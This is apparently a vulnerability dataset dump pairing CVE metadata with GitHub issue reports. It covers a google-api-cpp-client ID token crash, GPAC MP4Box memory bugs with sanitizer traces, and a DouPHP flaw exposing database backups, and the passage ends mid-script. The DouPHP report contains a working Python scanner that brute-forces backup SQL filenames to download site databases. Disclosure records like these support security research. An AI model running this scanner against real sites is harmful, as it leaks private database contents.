cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2018-20840
2019-05-30T16:29:01.323
An unhandled exception vulnerability exists during Google Sign-In with Google API C++ Client before 2019-04-10. It potentially causes an outage of third-party services that were not designed to recover from exceptions. On the client, ID token handling can cause an unhandled exception because of misinterpretation of an integer as a string, resulting in denial-of-service and then other users can no longer login/sign-in to the affected third-party service. Once this third-party service uses Google Sign-In with google-api-cpp-client, a malicious user can trigger this client/auth/oauth2_authorization.cc vulnerability by requesting the client to receive the ID token from a Google authentication server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/google-api-cpp-client/issues/57" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/google/google-api-cpp-client/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/google-api-cpp-client/issues/57" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/google/google-api-cpp-client/pull/58" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:google:api_c\\+\\+_client:*:*:*:*:*:*:*:*", "matchCriteriaId": "7FC7B0D8-5460-4105-BE2B-FD5AF56BE847", "versionEndExcluding": "2019-04-10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "754" ]
754
https://github.com/google/google-api-cpp-client/issues/57
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "google", "google-api-cpp-client" ]
Problem: The following errors occurred during the attempt to request ID Token with specifying ‘profile’ or ‘email’ in SCOPES parameter. ``` terminate called after throwing an instance of 'std::runtime_error' what(): Type is not convertible to string ``` Cause: When receiving ID Token from Google OAuth Server, ‘exp’ in the token is representing the type of integer. Unfortunately, 'google-api-cpp-client' deals with it as a string type; it causes the above problem. For your information, I attached the format of ID Token received from the server. ``` { "azp": "...”, "aud": "...", "sub": "...", "email": "...@gmail.com", "email_verified": true, "at_hash": "...", "exp": 1533783763, "iss": "accounts.google.com", "iat": 1533780163 } ```
Error on 'exp' type handling in ID Token
https://api.github.com/repos/google/google-api-cpp-client/issues/57/comments
7
2018-08-10T00:58:24Z
2019-06-26T21:36:50Z
https://github.com/google/google-api-cpp-client/issues/57
349,340,458
57
409
CVE-2019-12481
2019-05-30T23:29:00.267
An issue was discovered in GPAC 0.7.1. There is a NULL pointer dereference in the function GetESD at isomedia/track.c in libgpac.a, as demonstrated by MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1249" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1249" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00030.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1249
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # MP4Box ## version MP4Box 0.7.1 ## description ```txt GPAC version 0.7.1-rev0-g440d475-HEAD ``` ## download link ## others please send email to teamseri0us360@gmail.com if you have any questions. --------------------- ## DumpTrackInfo@filedump.c:2058-65___null-pointer-dereference ### description An issue was discovered in MP4Box 0.7.1, There is a/an null-pointer-dereference in function DumpTrackInfo at filedump.c:2058-65 ### commandline MP4Box -info @@ ### source ```c 2054 esd = gf_isom_get_esd(file, trackNum, 1); 2055 if (!esd) { 2056 fprintf(stderr, "WARNING: Broken MPEG-4 Track\n"); 2057 } else { >2058 const char *st = gf_odf_stream_type_name(esd->decoderConfig->streamType); 2059 if (st) { 2060 fprintf(stderr, "MPEG-4 Config%s%s Stream - ObjectTypeIndication 0x%02x\n", 2061 full_dump ? "\n\t" : ": ", st, esd->decoderConfig->objectTypeIndication); 2062 } else { 2063 fprintf(stderr, "MPEG-4 Config%sStream Type 0x%02x - ObjectTypeIndication 0x%02x\n", ``` ### my dbg ```c Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x0000000000428432 in DumpTrackInfo (file=0x655010, trackID=0x2, full_dump=GF_FALSE) at filedump.c:2058 2058 const char *st = gf_odf_stream_type_name(esd->decoderConfig->streamType); gdb-peda$ p esd $1 = (GF_ESD *) 0x659bb0 gdb-peda$ p esd->decoderConfig $2 = (GF_DecoderConfig *) 0x0 ``` ### bug report ```txt [iso file] more than one stts entry at the end of the track with sample_delta=0 - forbidden ! Fixing to 1 [ODF] Error reading descriptor (tag 4 size 47): Invalid MPEG-4 Descriptor [iso file] Unknown box type .... [iso file] Read Box type .... (0x01000000) has size 0 but is not at root/file level, skipping [iso file] Unknown box type ... [iso file] Unknown box type ...< [iso file] Unknown box type ...< [iso file] Unknown box type ...< [iso file] Unknown box type <JC. [iso file] Incomplete box UNKN [iso file] Incomplete file while reading for dump - aborting parsing * Movie Info * Timescale 600 - 2 tracks Computed Duration 00:00:04.966 - Indicated Duration 00:00:04.966 Fragmented File: no File suitable for progressive download (moov before mdat) File Brand mp42 - version 1 Compatible brands: mp42 mp41 Created: GMT Fri Oct 28 17:46:46 2005 Modified: GMT Fri Oct 28 17:46:46 2005 File has no MPEG4 IOD/OD Track # 1 Info - TrackID 1 - TimeScale 32000 Media Duration 00:00:00.004 - Indicated Duration 00:00:04.992 Track has 1 edit lists: track duration is 00:00:04.966 Media Info: Language "English (eng)" - Type "soun:mp4a" - 156 samples MPEG-4 Config: Audio Stream - ObjectTypeIndication 0x40 MPEG-4 Audio AAC LC - 2 Channel(s) - SampleRate 32000 Self-synchronized RFC6381 Codec Parameters: mp4a.40.2 All samples are sync Track # 2 Info - TrackID 2 - TimeScale 30 Media Duration 00:00:00.000 - Indicated Duration 00:00:04.966 Track has 1 edit lists: track duration is 00:00:04.966 Media Info: Language "English (eng)" - Type "vide:mp4v" - 0 samples Visual Track layout: x=0 y=0 width=190 height=240 AddressSanitizer:DEADLYSIGNAL ================================================================= ==4953==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x0000005794e8 bp 0x7ffde6e30af0 sp 0x7ffde6e0aba0 T0) ==4953==The signal is caused by a READ memory access. ==4953==Hint: address points to the zero page. #0 0x5794e7 in DumpTrackInfo /src/gpac/applications/mp4box/filedump.c:2058:65 #1 0x587ca2 in DumpMovieInfo /src/gpac/applications/mp4box/filedump.c:2950:3 #2 0x54d944 in mp4boxMain /src/gpac/applications/mp4box/main.c:4305:9 #3 0x7f7c7de2f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x4244e8 in _start (/src/gpac/installed-asan/bin/MP4Box+0x4244e8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/gpac/applications/mp4box/filedump.c:2058:65 in DumpTrackInfo ==4953==ABORTING ``` ### others from fuzz project None crash name None-00000322-1558597650.mp4 Auto-generated by pyspider at 2019-05-23 16:16:43 please send email to teamseri0us360@gmail.com if you have any questions. ## gf_isom_get_original_format_type@drm_sample.c:540-33___null-pointer-dereference ### description An issue was discovered in MP4Box 0.7.1, There is a/an null-pointer-dereference in function gf_isom_get_original_format_type at drm_sample.c:540-33 ### commandline MP4Box -info @@ ### source ```c 536 Media_GetSampleDesc(trak->Media, sampleDescriptionIndex, &sea, NULL); 537 if (!sea) return GF_BAD_PARAM; 538 539 sinf = (GF_ProtectionSchemeInfoBox*)gf_list_get(sea->protections, 0); > 540 if (outOriginalFormat && sinf->or \*bug=>*\ iginal_format) { 541 *outOriginalFormat = sinf->original_format->data_format; 542 } 543 return GF_OK; 544 } 545 ``` ### my debug ```c Stopped reason: SIGSEGV 0x00007ffff7865711 in gf_isom_get_original_format_type (the_file=0x655010, trackNumber=0x2, sampleDescriptionIndex=0x1, outOriginalFormat=0x7ffffffcbf94) at isomedia/drm_sample.c:540 540 if (outOriginalFormat && sinf->original_format) { $1 = (GF_ProtectionSchemeInfoBox *) 0x0 ``` ### bug report ```txt AddressSanitizer:DEADLYSIGNAL ================================================================= ==4969==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x7fd4b273ace9 bp 0x7ffc1d1f1070 sp 0x7ffc1d1f0fc0 T0) ==4969==The signal is caused by a READ memory access. ==4969==Hint: address points to the zero page. #0 0x7fd4b273ace8 in gf_isom_get_original_format_type /src/gpac/src/isomedia/drm_sample.c:540:33 #1 0x7fd4b2961ecc in gf_media_get_rfc_6381_codec_name /src/gpac/src/media_tools/dash_segmenter.c:429:8 #2 0x580975 in DumpTrackInfo /src/gpac/applications/mp4box/filedump.c:2647:3 #3 0x587ca2 in DumpMovieInfo /src/gpac/applications/mp4box/filedump.c:2950:3 #4 0x54d944 in mp4boxMain /src/gpac/applications/mp4box/main.c:4305:9 #5 0x7fd4b112682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x4244e8 in _start (/src/gpac/installed-asan/bin/MP4Box+0x4244e8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/gpac/src/isomedia/drm_sample.c:540:33 in gf_isom_get_original_format_type ==4969==ABORTING ``` ### others from fuzz project None crash name None-00000995-1558597651.mp4 Auto-generated by pyspider at 2019-05-23 16:16:43 please send email to teamseri0us360@gmail.com if you have any questions. ## GetESD@track.c:271-28___null-pointer-dereference ### description An issue was discovered in MP4Box 0.7.1, There is a/an null-pointer-dereference in function GetESD at track.c:271-28 ### commandline MP4Box -info @@ ### source ```c 267 if ( 268 #ifndef GPAC_DISABLE_ISOM_FRAGMENTS 269 moov->mvex && 270 #endif > 271 (esd->decoderConfig->streamType==GF_STREAM_VISUAL)) { 272 esd->slConfig->hasRandomAccessUnitsOnlyFlag = 0; 273 esd->slConfig->useRandomAccessPointFlag = 1; 274 if (trak->moov->mov->openMode!=GF_ISOM_OPEN_READ) 275 stbl->SyncSample = (GF_SyncSampleBox *) gf_isom_box_new(GF_ISOM_BOX_TYPE_STSS); 276 } else { ``` ### mydebug ```c Stopped reason: SIGSEGV 0x00007ffff78a6829 in GetESD (moov=0x656790, trackID=0x2, StreamDescIndex=0x1, outESD=0x7ffffffcbfe0) at isomedia/track.c:271 271 (esd->decoderConfig->streamType==GF_STREAM_VISUAL)) { gdb-peda$ p esd->decoderConfig $1 = (GF_DecoderConfig *) 0x0 ``` ### bug report ```txt [iso file] Unknown box type schh ICC colour profile not supported [iso file] Unknown box type .... [iso file] Incomplete box UNKN [iso file] Incomplete file while reading for dump - aborting parsing * Movie Info * Timescale 90000 - 2 tracks Computed Duration 00:00:00.000 - Indicated Duration 00:00:00.000 Fragmented File: yes - duration 00:00:05.589 1 fragments - 1 SegmentIndexes File suitable for progressive download (moov before mdat) File Brand iso5 - version 1 Compatible brands: avc1 .so5 dash Created: GMT Wed Mar 26 00:20:53 2014 Modified: GMT Wed Mar 26 00:20:54 2014 File has root IOD (9 bytes) Scene PL 0xff - Graphics PL 0xff - OD PL 0xff Visual PL: AVC/H264 Profile (0x7f) Audio PL: High Quality Audio Profile @ Level 2 (0x0f) No streams included in root OD iTunes Info: Encoder Software: HandBrake 0.9.9 2013052900 1 UDTA types: meta (1) Track # 1 Info - TrackID 1 - TimeScale 90000 Media Duration 00:00:00.000 - Indicated Duration 00:00:00.000 Media Info: Language "Undetermined (und)" - Type "vide:encv" - 0 samples Fragmented track: 15 samples - Media Duration 00:00:00.500 Visual Track layout: x=0 y=0 width=560 height=320 MPEG-4 Config: Visual Stream - ObjectTypeIndication 0x21 AVC/H264 Video - Visual Size 560 x 320 AVC Info: 0 SPS - 0 PPS - Profile Baseline @ Level 3 NAL Unit length bits: 32 Chroma format YUV 4:2:0 - Luma bit depth 8 - chroma bit depth 8 Self-synchronized *Encrypted stream - unknown scheme [ISOM Tools] Unkown protection scheme type  RFC6381 Codec Parameters: avc1.42C01E All samples are sync Track # 2 Info - TrackID 2 - TimeScale 48000 Media Duration 00:00:00.000 - Indicated Duration 00:00:00.000 Media Info: Language "English (eng)" - Type "soun:enca" - 0 samples Fragmented track: 24 samples - Media Duration 00:00:00.512 1 UDTA types: name (1) AddressSanitizer:DEADLYSIGNAL ================================================================= ==4998==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f500d1be119 bp 0x7ffeb6a2b510 sp 0x7ffeb6a2b2c0 T0) ==4998==The signal is caused by a READ memory access. ==4998==Hint: address points to the zero page. #0 0x7f500d1be118 in GetESD /src/gpac/src/isomedia/track.c:271:28 #1 0x7f500d0e230a in gf_isom_get_esd /src/gpac/src/isomedia/isom_read.c:1086:6 #2 0x57946a in DumpTrackInfo /src/gpac/applications/mp4box/filedump.c:2054:9 #3 0x587ca2 in DumpMovieInfo /src/gpac/applications/mp4box/filedump.c:2950:3 #4 0x54d944 in mp4boxMain /src/gpac/applications/mp4box/main.c:4305:9 #5 0x7f500baaa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x4244e8 in _start (/src/gpac/installed-asan/bin/MP4Box+0x4244e8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/gpac/src/isomedia/track.c:271:28 in GetESD ==4998==ABORTING ``` ### others from fuzz project None crash name None-00001079-1558597651.mp4 Auto-generated by pyspider at 2019-05-23 16:16:45 please send email to teamseri0us360@gmail.com if you have any questions. ## ReadGF_IPMPX_RemoveToolNotificationListener@ipmpx_code.c:1103-54___heap-buffer-overflow ### description An issue was discovered in MP4Box 0.7.1, There is a/an heap-buffer-overflow in function ReadGF_IPMPX_RemoveToolNotificationListener at ipmpx_code.c:1103-54 ### commandline MP4Box -info @@ ### source ```c 1099 { 1100 u32 i; 1101 GF_IPMPX_RemoveToolNotificationListener*p = (GF_IPMPX_RemoveToolNotificationListener*)_p; 1102 p->eventTypeCount = gf_bs_read_int(bs, 8); >1103 for (i=0; i<p->eventTypeCount; i++) p->eventType[i] = gf_bs_read_int(bs, 8); 1104 return GF_OK; 1105 } 1106 static u32 SizeGF_IPMPX_RemoveToolNotificationListener(GF_IPMPX_Data *_p) 1107 { 1108 GF_IPMPX_RemoveToolNotificationListener*p = (GF_IPMPX_RemoveToolNotificationListener*)_p; ``` ### bug report ```txt [iso file] Unknown box type .... ================================================================= ==5055==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000023c at pc 0x7fd7187bb791 bp 0x7ffc7c0c1d10 sp 0x7ffc7c0c1d08 WRITE of size 4 at 0x60400000023c thread T0 #0 0x7fd7187bb790 in ReadGF_IPMPX_RemoveToolNotificationListener /src/gpac/src/odf/ipmpx_code.c:1103:54 #1 0x7fd7187bb790 in GF_IPMPX_ReadData /src/gpac/src/odf/ipmpx_code.c:1981 #2 0x7fd7187b42a3 in gf_ipmpx_data_parse /src/gpac/src/odf/ipmpx_code.c:293:6 #3 0x7fd7187bae47 in ReadGF_IPMPX_MutualAuthentication /src/gpac/src/odf/ipmpx_code.c:440:7 #4 0x7fd7187bae47 in GF_IPMPX_ReadData /src/gpac/src/odf/ipmpx_code.c:1985 #5 0x7fd7187b42a3 in gf_ipmpx_data_parse /src/gpac/src/odf/ipmpx_code.c:293:6 #6 0x7fd718790176 in gf_odf_read_ipmp /src/gpac/src/odf/odf_code.c:2421:8 #7 0x7fd71876cf30 in gf_odf_read_descriptor /src/gpac/src/odf/desc_private.c:310:10 #8 0x7fd71876fe7f in gf_odf_parse_descriptor /src/gpac/src/odf/descriptors.c:161:8 #9 0x7fd71879bb29 in gf_odf_desc_read /src/gpac/src/odf/odf_codec.c:302:6 #10 0x7fd71856a82a in esds_Read /src/gpac/src/isomedia/box_code_base.c:1259:7 #11 0x7fd71861bc3c in gf_isom_box_read /src/gpac/src/isomedia/box_funcs.c:1323:9 #12 0x7fd71861bc3c in gf_isom_box_parse_ex /src/gpac/src/isomedia/box_funcs.c:196 #13 0x7fd71857f524 in audio_sample_entry_Read /src/gpac/src/isomedia/box_code_base.c:3952:8 #14 0x7fd71861bc3c in gf_isom_box_read /src/gpac/src/isomedia/box_funcs.c:1323:9 #15 0x7fd71861bc3c in gf_isom_box_parse_ex /src/gpac/src/isomedia/box_funcs.c:196 #16 0x7fd71861dcdf in gf_isom_box_array_read_ex /src/gpac/src/isomedia/box_funcs.c:1217:7 #17 0x7fd71858fdd3 in stsd_Read /src/gpac/src/isomedia/box_code_base.c:5604:9 #18 0x7fd71861bc3c in gf_isom_box_read /src/gpac/src/isomedia/box_funcs.c:1323:9 #19 0x7fd71861bc3c in gf_isom_box_parse_ex /src/gpac/src/isomedia/box_funcs.c:196 #20 0x7fd71861ab97 in gf_isom_parse_root_box /src/gpac/src/isomedia/box_funcs.c:42:8 #21 0x7fd71864182a in gf_isom_parse_movie_boxes /src/gpac/src/isomedia/isom_intern.c:204:7 #22 0x7fd718645e05 in gf_isom_open_file /src/gpac/src/isomedia/isom_intern.c:604:19 #23 0x7fd71864e478 in gf_isom_open /src/gpac/src/isomedia/isom_read.c:412:11 #24 0x54acf5 in mp4boxMain /src/gpac/applications/mp4box/main.c:4106:11 #25 0x7fd71701c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #26 0x4244e8 in _start (/src/gpac/installed-asan/bin/MP4Box+0x4244e8) 0x60400000023c is located 0 bytes to the right of 44-byte region [0x604000000210,0x60400000023c) allocated by thread T0 here: #0 0x4e8718 in malloc /work/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88 #1 0x7fd7187b4c06 in NewGF_IPMPX_RemoveToolNotificationListener /src/gpac/src/odf/ipmpx_code.c:1091:2 #2 0x7fd7187b4c06 in gf_ipmpx_data_new /src/gpac/src/odf/ipmpx_code.c:1714 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/gpac/src/odf/ipmpx_code.c:1103:54 in ReadGF_IPMPX_RemoveToolNotificationListener Shadow bytes around the buggy address: 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa 00 00 00 00 00 05 fa fa fd fd fd fd fd fd 0x0c087fff8010: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8020: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fd 0x0c087fff8030: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 =>0x0c087fff8040: fa fa 00 00 00 00 00[04]fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==5055==ABORTING ``` ### others from fuzz project None crash name None-00001119-1558597651.mp4 Auto-generated by pyspider at 2019-05-23 16:16:46 please send email to teamseri0us360@gmail.com if you have any questions. ## other info ```txt Linux 47851981ba92 3.19.0-79-generic #87~14.04.1-Ubuntu SMP Wed Dec 21 18:12:31 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux clang version 6.0.0 (tags/RELEASE_600/final) Target: x86_64-unknown-linux-gnu with Asan ``` [POC](https://github.com/TeamSeri0us/pocs/tree/master/gpac/MP4Box/vuln)
4 bugs found in gpac v0.7.1 release
https://api.github.com/repos/gpac/gpac/issues/1249/comments
2
2019-05-27T07:11:13Z
2019-07-10T08:47:22Z
https://github.com/gpac/gpac/issues/1249
448,700,419
1,249
410
CVE-2019-12564
2019-06-03T00:29:00.217
In DouCo DouPHP v1.5 Release 20190516, remote attackers can view the database backup file via a brute-force guessing approach for data/backup/DyyyymmddThhmmss.sql filenames.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/srsec/-srsec-/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/srsec/-srsec-/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:douco:douphp:1.5:20190516:*:*:*:*:*:*", "matchCriteriaId": "6EEBF95D-05FA-479D-AECD-108D4BFC3EC8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/srsec/-srsec-/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "srsec", "-srsec-" ]
The latest version of DouPHP v1.5 Release 20190516, the background can back up the entire station data, but does not have access control on the backup file, resulting in any user can view or now the database file. 1、Log in to the background and back up data through the data backup function,And generate a sql file in the format of the date. ![image](https://user-images.githubusercontent.com/50904323/58156296-5aba0080-7ca8-11e9-912b-f4b84faa33b7.png) 2、We look at the path generated by the backup file.http://url/data/backup/D20190522T154247.sql ![image](https://user-images.githubusercontent.com/50904323/58156664-2e52b400-7ca9-11e9-802d-6e1f6aee2324.png) 3、Any user can access the backup file path through the url, and can view the download backup file. ![image](https://user-images.githubusercontent.com/50904323/58156837-a1f4c100-7ca9-11e9-9803-db344a14a746.png) ![image](https://user-images.githubusercontent.com/50904323/58158295-bab2a600-7cac-11e9-8fdd-2f6e6b4b06d7.png) 4、Backup file generation format (current date and time format file). ![image](https://user-images.githubusercontent.com/50904323/58156906-c8b2f780-7ca9-11e9-98fe-8b6cade8a60b.png) --------------------------------------------------------------------------------------------------------- ![image](https://user-images.githubusercontent.com/50904323/58156980-f4ce7880-7ca9-11e9-93ef-04f7399bc559.png) 5、follow up ROOT_PATH,Check the core file and make no access restrictions on the backup file, resulting in a vulnerability. ![image](https://user-images.githubusercontent.com/50904323/58157058-21829000-7caa-11e9-89ba-82a2a03606a9.png). 6、POC (Dict.txt needs to be customized to generate a dictionary in time format)。 ---------------------------------------------------------------------------------------------------- import urllib.request import time import threading url = input("url:") txt = input("dict(dict.txt):") open_url = [] all_url = [] threads = [] #Can be customized def search_url(url,txt): with open(txt,'r') as f: for each in f: each = each.replace('\n','') urllist = url + each +'.sql' all_url.append(urllist) def handle_url(urllist): print("Find:"+urllist+'\n') try: req = urllib.request.urlopen(urllist) #Judgment return code if req.getcode()==200 or 304: open_url.append(urllist) print("[+]Find file:"+urllist+'\n') if req.getcode()==304: print("[+]Find file:"+urllist+'\n') open_url.append(urllist) except: pass def main(): search_url(url,txt) for each in all_url: t = threading.Thread(target = handle_url,args=(each,)) threads.append(t) t.start() for t in threads: t.join() if open_url: print("Successful scan, successful url::") for each in open_url: print("[+]"+each) else: print("There is a scan to the background of the website (maybe the dictionary is not enough to force)") if __name__=="__main__": #Judge program run time start = time.clock() main() end = time.clock() print("The function spend time is %.3f seconds" %(end-start)) ---------------------------------------------------------------------------------------------------- 7、Generate a specific date dictionary file script ---------------------------------------------------------------------------------------------------- import time #Can be customized for h in range(15,16): for i in range(0,61): for s in range(0,61): if(h==0 and i==0 and s==0): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s)+'0',time.localtime(time.time())) # print(data) elif h==0 and i==0 and (s>0 and s<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time())) elif h==0 and i==0 and (s>=10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time())) # print(data) elif h==0 and (i>=10) and (s>0 and s<9): data=time.strftime('D%Y%m%dT'+'0'+str(h)+str(i)+'0'+str(s),time.localtime(time.time())) elif i==0 and s==0 and (h>0 and h<10): data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time())) # print(data) elif h==0 and ((i>0 and i<10)) and 